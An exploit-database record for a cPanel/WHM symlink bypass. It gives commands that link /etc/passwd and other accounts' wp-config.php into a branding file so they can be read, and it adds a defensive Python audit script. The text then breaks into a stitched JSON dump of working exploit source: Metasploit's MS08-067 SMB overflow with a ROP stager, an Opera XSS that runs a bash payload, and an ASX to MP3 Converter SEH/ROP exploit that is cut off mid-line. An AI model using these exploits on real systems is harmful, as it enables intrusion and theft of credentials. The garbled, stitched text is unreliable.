ID: 1337DAY-ID-16304
Type: zdt
Reporter: ZxH-Labs
Modified: 2011-06-11T00:00:00
Description: Exploit for php platform in category web applications
# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!
# Version : 11.30.0 <Build 27>
# Author : ZxH-Labs
# Date : 1st OF Jun 2011
# Tested On CentOS
# Software Link : http://www.cpanel.net
# Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploiting cPanel x ....
At First , You Must Have A Reseller Account ( Note : We Won't Need Port 2086 :)
Okay Now Open SSH Or The File Manager , Then Go To
/home/user/cpanelbranding/x3
Note : You Can Change x3 To The Template You're Actually Running
Okay Now Execute These Commands To Delete The File And Make A Symlink To Read It
# 0x01 : z1d@dns.j0 [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png
The Second Will Work Successfully Without Any Problem'z !
Okay .. Now If You Want To Read Another File .. You Have To Check Whether You Can Read It Or Not
So .. Execute This Command :
# 0x021 : z1d@dns.j0 [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x
You'll Get Some Path'z .. So You Can Read Them Easily
# 0x03 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png
Note : /home/user/public_html Must Be Chmoded 755 / drwxr-xr-x
[+] Reading Data From cPanel X ...
Okay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !
Okay Now Go 2 cPanel X
# 0x01 : http://domain.com/net/..etc:2082
# 0x02 : http://ip:2082
# 0x03 : https://domain.com/net/..etc:2082
# 0x04 : https://ip:2082
Now View The Source And Search For "ui_sprites_bg_snap_to_smallest_width.png"
You'll See This
"("/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png");}#ui-aqua-hd-bg{background-position:"
Now Append That Path To Your cPanel URL To Get The File
[+] Full Exploit of cPanel X ...
Now Open This Link
# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
[+] Note For All
We All Have More And More Exploits For cPanel X , But I Want You 2 Know That All Exploit'z Will Not Bypass Forbidden .. Only If The File Has 755 Permission
However I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !
./b0x-j0
[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)
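As a defender-side check for the technique described above, here is an added audit script (not part of the original advisory and not cPanel's own tooling): it walks each account's cpanelbranding tree for symlinks that resolve outside that account's home, and lists accounts whose public_html is world-traversable (755), which is the precondition the advisory names. The /home/<account>/cpanelbranding/<theme> layout and the public_html permission condition come from the advisory; the account names and fixture contents in build_demo_tree() are constructed, and a POSIX filesystem is assumed.

```python
"""Audit a cPanel host for the branding-directory symlink trick described above.

Added example, not part of the original advisory or of cPanel's own tooling.
It assumes the layout the advisory shows (/home/<account>/cpanelbranding/<theme>/
and /home/<account>/public_html) and a POSIX filesystem; build_demo_tree() creates
a constructed fixture so the audit can be run offline.
"""
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    account: str   # account that owns the branding directory
    link: str      # path of the symlink inside cpanelbranding
    target: str    # fully resolved target of the symlink


def _inside(path: str, root: str) -> bool:
    """True if path (after resolving symlinks) lies at or below root."""
    root = os.path.realpath(root)
    path = os.path.realpath(path)
    return path == root or path.startswith(root + os.sep)


def escaped_symlinks(home_root: str = "/home") -> list:
    """Symlinks under <home_root>/*/cpanelbranding that resolve outside the owner's home.

    The advisory's trick is exactly such a link: the panel serves the branding file
    through the link, so any target outside the account's own home is a read of
    someone else's data. Links that stay inside the home are left alone.
    """
    findings = []
    for account in sorted(os.listdir(home_root)):
        home = os.path.join(home_root, account)
        branding = os.path.join(home, "cpanelbranding")
        if not os.path.isdir(branding):
            continue
        # followlinks=False: do not descend into a symlinked directory, just report it
        for dirpath, dirnames, filenames in os.walk(branding, followlinks=False):
            for name in sorted(dirnames + filenames):
                full = os.path.join(dirpath, name)
                if os.path.islink(full) and not _inside(full, home):
                    findings.append(Finding(account, full, os.path.realpath(full)))
    return findings


def world_traversable_public_html(home_root: str = "/home") -> list:
    """Accounts whose public_html carries o+x (e.g. drwxr-xr-x / 755).

    That bit is the precondition the advisory names: without it, a link from
    another account cannot be followed into the directory at all.
    """
    exposed = []
    for account in sorted(os.listdir(home_root)):
        public_html = os.path.join(home_root, account, "public_html")
        try:
            st = os.lstat(public_html)
        except FileNotFoundError:
            continue
        if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IXOTH:
            exposed.append(account)
    return exposed


def build_demo_tree() -> str:
    """Constructed fixture: a fake /home with one reseller and two customer accounts."""
    root = tempfile.mkdtemp(prefix="cpanel-audit-")
    # a stand-in for /etc/passwd so the fixture never touches the real system
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    for account, mode in (("victim", 0o755), ("locked", 0o750)):
        public_html = os.path.join(root, account, "public_html")
        os.makedirs(public_html)
        os.chmod(public_html, mode)  # explicit chmod, so umask cannot change the result
        with open(os.path.join(public_html, "wp-config.php"), "w") as fh:
            fh.write("<?php define('DB_PASSWORD', 'constructed-sample'); ?>\n")
    theme = os.path.join(root, "reseller", "cpanelbranding", "x3")
    os.makedirs(theme)
    with open(os.path.join(theme, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG constructed")                                # regular file: ignored
    os.symlink("logo.png", os.path.join(theme, "logo_copy.png"))        # stays in home: ignored
    # the two links the advisory builds, named after the sprite file the panel serves
    os.symlink(os.path.join(root, "victim", "public_html", "wp-config.php"),
               os.path.join(theme, "ui_sprites_bg_snap_to_smallest_width.png"))
    os.symlink(os.path.join(root, "etc", "passwd"),
               os.path.join(theme, "sprites_bg_snap_to_smallest_width.png"))
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for f in escaped_symlinks(demo):
        print(f"[{f.account}] {f.link} -> {f.target}")
    print("world-traversable public_html:", world_traversable_public_html(demo))
```

On a real host run it as root against /home; every Finding is a branding file that the panel would serve from another account's data, and every exposed account is one whose directory permissions let such a link be followed.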
# 0day.today [2018-01-01] #
Source: https://0day.today/exploit/16304 (record 1337DAY-ID-16304, published 2011-06-11, last seen 2018-01-01)
service to crash')\n return\n else\n raise e\n end\n end\n\n # Use a copy of the target\n mytarget = target\n\n if target['auto']\n\n mytarget = nil\n\n print_status('Automatically detecting the target...')\n fprint = smb_fingerprint\n\n print_status(\"Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}\")\n\n # Bail early on unknown OS\n if (fprint['os'] == 'Unknown')\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n # Windows 2000 is mostly universal\n if (fprint['os'] == 'Windows 2000')\n mytarget = targets[1]\n end\n\n # Windows XP SP0/SP1 is mostly universal\n if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'\n mytarget = targets[2]\n end\n\n # Windows 2003 SP0 is mostly universal\n if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?\n mytarget = targets[3]\n end\n\n # Windows 2003 R2 is treated the same as 2003\n if (fprint['os'] == 'Windows 2003 R2')\n fprint['os'] = 'Windows 2003'\n end\n\n # Service Pack match must be exact\n if (not mytarget) and fprint['sp'].index('+')\n print_error('Could not determine the exact service pack')\n print_error(\"Auto-targeting failed, use 'show targets' to manually select one\")\n disconnect\n return\n end\n\n # Language Pack match must be exact or we default to English\n if (not mytarget) and fprint['lang'] == 'Unknown'\n print_status('We could not detect the language pack, defaulting to English')\n fprint['lang'] = 'English'\n end\n\n # Normalize the service pack string\n fprint['sp'].gsub!(/Service Pack\\s+/, 'SP')\n\n unless mytarget\n targets.each do |t|\n # Prefer AlwaysOn NX over NX, and NX over non-NX\n if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(AlwaysOn NX\\)/\n mytarget = t\n break\n end\n if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(NX\\)/\n mytarget = t\n break\n end\n end\n end\n\n unless mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected Target: 
#{mytarget.name}\")\n end\n\n #\n # Build the malicious path name\n #\n\n padder = [*('A'..'Z')]\n pad = 'A'\n while pad.length < 7\n c = padder[rand(padder.length)]\n next if pad.index(c)\n pad += c\n end\n\n prefix = '\\\\'\n path = ''\n server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase\n\n #\n # Windows 2003 SP2 (NX) targets\n #\n if mytarget['RetDec']\n\n jumper = Rex::Text.rand_text_alpha(70).upcase\n jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room\n\n jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space\n jumper[ 8, 4] = [mytarget['RetDec']].pack('V')\n jumper[ 12, 4] = [mytarget['RetDec']].pack('V')\n jumper[ 16, 4] = [mytarget['RetDec']].pack('V')\n\n jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP\n jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')\n\n jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')\n jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')\n jumper[ 64, 2] = \"\\xeb\\x02\" # our jump\n jumper[ 68, 2] = \"\\xeb\\x62\" # original\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # Writable memory location (static)\n [mytarget['Scratch']].pack('V') + # EBP\n\n # Return to code which disables NX (or just the return)\n [mytarget['RetDec']].pack('V') +\n\n # Padding with embedded jump\n jumper +\n\n # NULL termination\n \"\\x00\" * 2\n\n #\n # Windows XP SP2/SP3 ROP Stager targets\n #\n elsif mytarget['UseROP']\n\n rop = generate_rop(mytarget['UseROP'])\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # 
ROP Stager\n rop +\n\n # Padding (skipped)\n Rex::Text.rand_text_alpha(2) +\n\n # NULL termination\n \"\\x00\" * 2\n\n #\n # Windows 2000, XP (NX), and 2003 (NO NX) targets\n #\n else\n\n jumper = Rex::Text.rand_text_alpha(70).upcase\n jumper[ 4, 4] = [mytarget.ret].pack('V')\n jumper[50, 8] = make_nops(8)\n jumper[58, 2] = \"\\xeb\\x62\"\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # Writable memory location (static)\n [mytarget['Scratch']].pack('V') + # EBP\n\n # Return to code which disables NX (or just the return)\n [mytarget['DisableNX'] || mytarget.ret].pack('V') +\n\n # Padding with embedded jump\n jumper +\n\n # NULL termination\n \"\\x00\" * 2\n\n end\n\n handle = dcerpc_handle(\n '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n dcerpc_bind(handle)\n\n stub =\n NDR.uwstring(server) +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(1024)) +\n NDR.wstring(prefix) +\n NDR.long(4097) +\n NDR.long(0)\n\n # NOTE: we don't bother waiting for a response here...\n print_status('Attempting to trigger the vulnerability...')\n dcerpc.call(0x1f, stub, false)\n\n # Cleanup\n handler\n disconnect\n end\n\n def check\n begin\n connect\n smb_login\n rescue Rex::ConnectionError => e\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n if e.message =~ /Connection reset/\n vprint_error('Connection reset during login')\n vprint_error('This most likely means a previous exploit attempt caused the service to crash')\n return Msf::Exploit::CheckCode::Unknown\n else\n raise e\n end\n end\n\n #\n # Build the malicious path name\n # 5b878ae7 \"db @eax;g\"\n prefix 
= '\\\\'\n path =\n \"\\x00\\\\\\x00/\" * 0x10 +\n Rex::Text.to_unicode('\\\\') +\n Rex::Text.to_unicode('R7') +\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n Rex::Text.to_unicode('R7') +\n \"\\x00\" * 2\n\n server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase\n\n handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n begin\n # Samba doesn't have this handle and returns an ErrorCode\n dcerpc_bind(handle)\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"SMB error: #{e.message}\")\n return Msf::Exploit::CheckCode::Safe\n end\n\n vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)\n\n stub =\n NDR.uwstring(server) +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(8) +\n NDR.wstring(prefix) +\n NDR.long(4097) +\n NDR.long(0)\n\n resp = dcerpc.call(0x1f, stub)\n error = resp[4, 4].unpack('V')[0]\n\n # Cleanup\n simple.client.close\n simple.client.tree_disconnect\n disconnect\n\n if (error == 0x0052005c) # \\R :)\n return Msf::Exploit::CheckCode::Vulnerable\n else\n vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error\n return Msf::Exploit::CheckCode::Safe\n end\n end\n\n def generate_rop(version)\n free_byte = \"\\x90\"\n # free_byte = \"\\xcc\"\n\n # create a few small gadgets\n # <free byte>; pop edx; pop ecx; ret\n gadget1 = free_byte + \"\\x5a\\x59\\xc3\"\n # mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd\n gadget2 = free_byte + \"\\x89\\xc7\" + \"\\x83\\xc7\\x0c\" + \"\\x6a\\x7f\" + \"\\x59\" + \"\\xf2\\xa5\" + free_byte\n # <must complete \\x00 two byte opcode>; <free_byte>; jmp $+0x5c\n gadget3 = \"\\xcc\" + free_byte + \"\\xeb\\x5a\"\n\n # gadget2:\n # get eax into edi\n # adjust edi\n # get 0x7f in ecx\n # copy the data\n # jmp to it\n #\n dws = gadget2.unpack('V*')\n\n ##\n # Create the ROP stager, pfew.. 
Props to corelanc0d3r!\n # This was no easy task due to space limitations :-/\n # -jduck\n ##\n module_name = 'ACGENRAL.DLL'\n module_base = 0x6f880000\n\n rvasets = {}\n # XP SP2\n rvasets['5.1.2600.2180'] = {\n # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret\n 'call_HeapCreate' => 0x21064,\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,\n 'pop ecx / ret' => 0x2e546 + 6,\n 'mov [eax], ecx / ret' => 0xd182,\n 'jmp eax' => 0x19b85,\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,\n 'mov [eax+0x10], ecx / ret' => 0x10976 + 6,\n 'add eax, 8 / ret' => 0x29a14\n }\n\n # XP SP3\n rvasets['5.1.2600.5512'] = {\n # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret\n 'call_HeapCreate' => 0x21286,\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,\n 'pop ecx / ret' => 0x2e796 + 6,\n 'mov [eax], ecx / ret' => 0xd296,\n 'jmp eax' => 0x19c6f,\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,\n 'mov [eax+0x10], ecx / ret' => 0x10a56 + 6,\n 'add eax, 8 / ret' => 0x29c64\n }\n\n # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180\n rop = [\n # prime ebp (adjustment distance)\n 0x00018000,\n\n # get some RWX memory via HeapCreate\n 'call_HeapCreate',\n 0x01040110, # flOptions (gets & with 0x40005)\n 0x01010101,\n 0x01010101,\n\n # adjust the returned pointer\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret',\n\n # setup gadget1\n 'pop ecx / ret',\n gadget1.unpack('V').first,\n 'mov [eax], ecx / ret',\n\n # execute gadget1\n 'jmp eax',\n\n # setup gadget2 (via gadget1)\n dws[0],\n dws[1],\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',\n\n # setup part3 of gadget2\n 'pop ecx / ret',\n dws[2],\n 'mov [eax+0x10], ecx / ret',\n\n # execute gadget2\n 'add eax, 8 / ret',\n 'jmp eax',\n\n # gadget3 gets executed after gadget2 (luckily)\n gadget3.unpack('V').first\n ]\n\n # convert the meta rop into concrete bytes\n rvas = rvasets[version]\n\n rop.map! { |e|\n if e.kind_of? 
String\n # Meta-replace (RVA)\n fail_with(Failure::BadConfig, \"Unable to locate key: \\\"#{e}\\\"\") unless rvas[e]\n module_base + rvas[e]\n\n elsif e == :unused\n # Randomize\n rand_text(4).unpack('V').first\n\n else\n # Literal\n e\n end\n }\n\n ret = rop.pack('V*')\n\n # check badchars?\n # idx = Rex::Text.badchar_index(ret, payload_badchars)\n\n ret\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms08_067_netapi.rb"}, {"lastseen": "2019-11-20T21:02:39", "bulletinFamily": "exploit", "description": "Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. Affects Opera versions between 9.50 and 9.61.\n", "modified": "2017-07-24T13:26:21", "published": "2009-07-21T15:20:35", "id": "MSF:EXPLOIT/MULTI/BROWSER/OPERA_HISTORYSEARCH", "href": "", "type": "metasploit", "title": "Opera historysearch XSS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::OPERA,\n # :javascript => true,\n # :rank => ExcellentRanking, # reliable command execution\n # :vuln_test => %Q{\n # v = parseFloat(opera.version());\n # if (9.5 < v && 9.62 > v) {\n # is_vuln = true;\n # }\n # },\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Opera historysearch XSS',\n 'Description' => %q{\n Certain constructs are not escaped correctly by Opera's History\n Search results. 
These can be used to inject scripts into the\n page, which can then be used to modify configuration settings\n and execute arbitrary commands. Affects Opera versions between\n 9.50 and 9.61.\n },\n 'License' => BSD_LICENSE,\n 'Author' =>\n [\n 'Roberto Suggi', # Discovered the vulnerability\n 'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec\n 'egypt', # msf module\n ],\n 'References' =>\n [\n ['CVE', '2008-4696'],\n ['OSVDB', '49472'],\n ['BID', '31869'],\n ['URL', 'http://www.opera.com/support/kb/view/903/'],\n ],\n 'Payload' =>\n {\n 'EXITFUNC' => 'process',\n 'Space' => 4000,\n 'DisableNops' => true,\n 'BadChars' => \"\\x09\\x0a\\x0d\\x20\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl ruby telnet',\n }\n },\n 'Platform' => %w{ unix },\n 'Targets' =>\n [\n #[ 'Automatic', { } ],\n #[ 'Opera < 9.61 Windows',\n #\t{\n #\t\t'Platform' => 'win',\n #\t\t'Arch' => ARCH_X86,\n #\t}\n #],\n [ 'Opera < 9.61 Unix Cmd',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n }\n ],\n ],\n 'DisclosureDate' => 'Oct 23 2008', # Date of full-disclosure post showing code exec\n 'DefaultTarget' => 0\n ))\n end\n\n def on_request_uri(cli, request)\n\n headers = {}\n html_hdr = %Q^\n <html>\n <head>\n <title>Loading</title>\n ^\n html_ftr = %Q^\n </head>\n <body >\n <h1>Loading</h1>\n </body></html>\n ^\n\n case request.uri\n when /[?]jspayload/\n p = regenerate_payload(cli)\n if (p.nil?)\n send_not_found(cli)\n return\n end\n # We're going to run this through unescape(), so make sure\n # everything is encoded\n penc = Rex::Text.to_hex(p.encoded, \"%\")\n content =\n %Q{\n var s = document.createElement(\"iframe\");\n\n s.src=\"opera:config\";\n s.id=\"config_window\";\n document.body.appendChild(s);\n config_window.eval(\n \"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');\" +\n \"old_app = opera.getPreference('Mail','External Application');\" +\n \"old_handler = opera.getPreference('Mail','Handler');\" +\n 
\"opera.setPreference('Mail','External Application',cmd);\" +\n \"opera.setPreference('Mail','Handler','2');\" +\n \"app_link = document.createElement('a');\" +\n \"app_link.setAttribute('href', 'mailto:a@b.com');\" +\n \"app_link.click();\" +\n \"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);\" +\n \"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);\" +\n \"\");\n setTimeout(function () {window.location='about:blank'},1);\n }\n\n when /[?]history/\n js = %Q^\n window.onload = function() {\n location.href = \"opera:historysearch?q=*\";\n }\n ^\n content = %Q^\n #{html_hdr}\n <script><!--\n #{js}\n //--></script>\n #{html_ftr}\n ^\n when get_resource()\n print_status(\"Sending #{self.name} for request #{request.uri}\")\n\n js = %Q^\n if (window.opera) {\n var wnd = window;\n while (wnd.parent != wnd) {\n wnd = wnd.parent;\n }\n url = location.href;\n wnd.location = url + \"?history#<script src='\" + url +\"?\" + \"jspayload=1'/><!--\";\n }\n ^\n content = %Q^\n #{html_hdr}\n <script><!--\n #{js}\n //--></script>\n #{html_ftr}\n ^\n else\n print_status(\"Sending 404 for request #{request.uri}\")\n send_not_found(cli)\n return\n end\n content.gsub!(/^ {8}/, '')\n content.gsub!(/\\t/, ' ')\n\n send_response_html(cli, content, headers)\n handler(cli)\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/opera_historysearch.rb"}], "zdt": [{"lastseen": "2018-04-12T19:46:55", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2010-07-13T00:00:00", "published": "2010-07-13T00:00:00", "id": "1337DAY-ID-13319", "href": "https://0day.today/exploit/description/13319", "type": "zdt", "title": "ASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)", "sourceData": 
"====================================================================\r\nASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)\r\n====================================================================\r\n\r\n\r\n# Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple OS, DEP and ASLR Bypass)\r\n# Date: July 13, 2010\r\n# Author: Node\r\n# Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe\r\n# Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation\r\n# Tested on: Windows Vista Ultimate SP1 Eng\r\n# Windows Vista Ultimate SP2 Eng\r\n# Windows XP Pro SP3 Eng\r\n# Windows XP Pro SP2 Swe\r\n# Windows XP Pro SP3 Swe\r\n# Windows XP Home SP3 Swe\r\n# CVE :\r\n# Notes: This is a proof of concept that it is possible to write ROP exploits\r\n# that are portable to different operating systems. This exploit is\r\n# using the following variables:\r\n#\r\n# 1. \"Offset\": The offset to the SEH overwrite\r\n# 2. \"Offset2\": The offset before the ROP code starts in the buffer\r\n# 3. \"K32Offset\": The offset to the kernel32 pointer on the stack\r\n# 4. \"VPOffset\": The offset to VirtualProtect() from the grabbed\r\n# kernel32 address\r\n# 5. \"ASLR\": Activates or deactivates the ASLR bypassing ROP code\r\n#\r\n# The K32Offset and VPOffset are negged hex-numbers, to evade the\r\n# null-byte problem. In the first target, K32Offset is \"0xfffebcac\"\r\n# which gets converted in the ROP code to 0x00014354 (82772), which is\r\n# how much the saved ESP address needs to be subtracted, to point to\r\n# the kernel32 address. 
VPOffset is how much the Kernel32 address\r\n# needs to be subtracted, to point to the VirtualProtect() function.\r\n# If \"ASLR\" is false, \"VPOffset\" will be treated as the direct,\r\n# non-negged address to VirtualProtect() in Kernel32.dll.\r\n# Code:\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Mini-Stream Software ASX to MP3 Converter v3.1.2.1 SEH Buffer Overflow.',\r\n 'Description' => %q{\r\n This module exploits a SEH-based buffer overflow in ASX to MP3 Converter\r\n v.3.1.2.1. An attacker must send the file to victim, and the victim must open\r\n the specially crafted M3U file. This exploit is written with ROP gadgets from\r\n MSA2Mfilter03.dll and bypasses DEP on all systems including ASLR on Vista.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'Node' ],\r\n 'Version' => '$Revision: 99999 $',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP1 Eng x86', \r\n {'Offset' => 43511,\r\n 'Offset2' => 16339,\r\n 'K32Offset' => 0xfffebcac,\r\n 'VPOffset' => 0xfffe4e9c,\r\n 'ASLR' => true } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP2 Eng x86', \r\n {'Offset' => 43511,\r\n 'Offset2' => 16339,\r\n 'K32Offset' => 0xfffebcac,\r\n 'VPOffset' => 0xfffe5bf0,\r\n 'ASLR' => true } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Eng x86', \r\n {'Offset' => 43484,\r\n 'Offset2' => 16312,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP2 Swe x86', \r\n {'Offset' => 43476,\r\n 'Offset2' => 16304,\r\n 'VPOffset' => 0x7c801ad0,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Swe x86', \r\n {'Offset' => 
43491,\r\n 'Offset2' => 16319,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Home SP3 Swe x86', \r\n {'Offset' => 43476,\r\n 'Offset2' => 16304,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'The file name.', 'asx2mp3.m3u']),\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n rop = [0x1002F7B7].pack('V') # PUSH ESP # AND AL,0C # NEG EDX # NEG EAX # SBB EDX,0 # POP EBX # RETN 10\r\n rop << [0x10023315].pack('V') # ADD ESP,20 # RETN \r\n rop << \"1111\" # VirtualProtect() placeholder\r\n rop << \"2222\" #return address placeholder\r\n rop << \"3333\" #lpAddress placeholder\r\n rop << \"4444\" #dwsize placeholder\r\n rop << \"5555\" #flNewProtect placeholder\r\n rop << [0x10066005].pack('V') # lpflOldProtect writable address\r\n rop << \"A\" * 8\r\n rop << \"A\" * 16 # because of RETN 10\r\n rop << [0x1002991C].pack('V') # XOR EDX,EDX # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16\r\n \r\n \r\n if target['ASLR'] == true\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << [target['K32Offset']].pack('V')\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x1002C86A].pack('V') # SUB EAX,ECX # 